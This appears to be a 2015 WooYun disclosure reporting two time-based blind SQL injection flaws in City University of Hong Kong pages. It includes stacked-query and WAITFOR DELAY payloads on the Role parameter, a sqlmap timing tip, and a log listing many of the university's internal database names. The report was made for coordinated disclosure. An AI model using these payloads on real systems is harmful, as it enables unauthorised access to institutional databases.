当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147178

漏洞标题:香港城市大学两处延时SQL注入漏洞(香港地區)

相关厂商:hkcert香港互联网应急协调中心

漏洞作者: 偶然

提交时间:2015-10-17 21:44

修复时间:2015-12-04 16:12

公开时间:2015-12-04 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

在linux系统下,加上--time-sec 参数才能跑出数据

详细说明:

http://**.**.**.**/ccr/People_All.aspx?Role=Core_Member --time-sec 50
http://**.**.**.**/com/People_All.aspx?Role=Administrative_Staff --time-sec 50

漏洞证明:

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Role=Core_Member'); WAITFOR DELAY '0:0:50'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Role=Core_Member') WAITFOR DELAY '0:0:50'--
---
[14:14:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:14:19] [INFO] fetching database names
[14:14:19] [INFO] the SQL query used returns 159 entries
[14:14:20] [INFO] retrieved: aadbapp
[14:14:20] [INFO] retrieved: acarl
[14:14:21] [INFO] retrieved: admo
[14:14:21] [INFO] retrieved: adr
[14:14:23] [INFO] retrieved: ah
[14:14:23] [INFO] retrieved: ais
[14:14:24] [INFO] retrieved: ais2
[14:14:25] [INFO] retrieved: apdb
[14:14:25] [INFO] retrieved: aro
[14:14:26] [INFO] retrieved: arro
[14:14:27] [INFO] retrieved: arro_db
[14:14:31] [INFO] retrieved: bch_cheng
[14:14:32] [INFO] retrieved: bchdb
[14:14:32] [INFO] retrieved: bchdb2
[14:14:36] [INFO] retrieved: bshxwen
[14:14:37] [INFO] retrieved: bst_info_bank
[14:14:37] [INFO] retrieved: caio
[14:14:38] [INFO] retrieved: caio_cms
[14:14:38] [INFO] retrieved: caio_intern
[14:14:38] [INFO] retrieved: campusvr
[14:14:39] [INFO] retrieved: cap_alumni
[14:14:39] [INFO] retrieved: cash
[14:14:43] [INFO] retrieved: cc_ctu_awa
[14:14:47] [INFO] retrieved: cc_ctu_hl
[14:14:51] [INFO] retrieved: cc_duty
[14:14:51] [INFO] retrieved: cc_sms
[14:14:52] [INFO] retrieved: cc_sql_log
[14:14:52] [INFO] retrieved: cccshung
[14:14:52] [INFO] retrieved: cc-ctu
[14:14:53] [INFO] retrieved: ccic
[14:14:57] [INFO] retrieved: cc-image
[14:14:57] [INFO] retrieved: ccmatthew
[14:14:58] [INFO] retrieved: ccr
[14:14:58] [INFO] retrieved: cctest
[14:14:59] [INFO] retrieved: cc-vod
[14:14:59] [INFO] retrieved: cepie
[14:15:00] [INFO] retrieved: class
[14:15:00] [INFO] retrieved: col
[14:15:01] [INFO] retrieved: com
[14:15:01] [INFO] retrieved: com_prlab
[14:15:02] [INFO] retrieved: comdb2
[14:15:02] [INFO] retrieved: con_archive
[14:15:06] [INFO] retrieved: convocation
[14:15:07] [INFO] retrieved: copsre
[14:15:07] [INFO] retrieved: cosdaf
[14:15:08] [INFO] retrieved: csc
[14:15:09] [INFO] retrieved: csc_log
[14:15:09] [INFO] retrieved: cse
[14:15:10] [INFO] retrieved: csidb
[14:15:11] [INFO] retrieved: csie
[14:15:12] [INFO] retrieved: ctl
[14:15:12] [INFO] retrieved: cttfs
[14:15:13] [INFO] retrieved: ctu_anniv
[14:15:14] [INFO] retrieved: ctuoncities
[14:15:20] [INFO] retrieved: cturecruit
[14:15:20] [INFO] retrieved: cuo
[14:15:21] [INFO] retrieved: DAOClassnote
[14:15:22] [INFO] retrieved: demo
[14:15:22] [INFO] retrieved: dfest
[14:15:26] [INFO] retrieved: do
[14:15:26] [INFO] retrieved: dss
[14:15:27] [INFO] retrieved: dssidb
[14:15:27] [INFO] retrieved: ecard
[14:15:28] [INFO] retrieved: edo
[14:15:28] [INFO] retrieved: edolcc
[14:15:29] [INFO] retrieved: edoltl
[14:15:29] [INFO] retrieved: edosi
[14:15:33] [INFO] retrieved: edotuc
[14:15:33] [INFO] retrieved: elc
[14:15:35] [INFO] retrieved: elco
[14:15:36] [INFO] retrieved: elearn
[14:15:37] [INFO] retrieved: emalias
[14:15:38] [INFO] retrieved: en
[14:15:39] [INFO] retrieved: en-intern
[14:15:40] [INFO] retrieved: en-lcp
[14:15:41] [INFO] retrieved: en-lcp-bst
[14:15:42] [INFO] retrieved: en-lcp-fb
[14:15:43] [INFO] retrieved: en-lcp-fse
[14:15:46] [INFO] retrieved: en-lcp-scm
[14:15:46] [INFO] retrieved: en-lcp-slw
[14:15:47] [INFO] retrieved: en-lcp-sr
[14:15:48] [INFO] retrieved: foadmin
[14:15:49] [INFO] retrieved: fse
[14:15:49] [INFO] retrieved: fse_office
[14:15:50] [INFO] retrieved: fym
[14:15:50] [INFO] retrieved: garc
[14:15:51] [INFO] retrieved: ge_advise
[14:15:51] [INFO] retrieved: ge2012conf
[14:15:52] [INFO] retrieved: ges
[14:15:53] [INFO] retrieved: greencon
[14:15:53] [INFO] retrieved: hitcount
[14:15:54] [INFO] retrieved: innov
[14:15:54] [INFO] retrieved: isurvey
[14:15:55] [INFO] retrieved: kto

修复方案:

版权声明:转载请注明来源 偶然@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-20 16:11

厂商回复:

已聯絡相關機構處理

最新状态:

暂无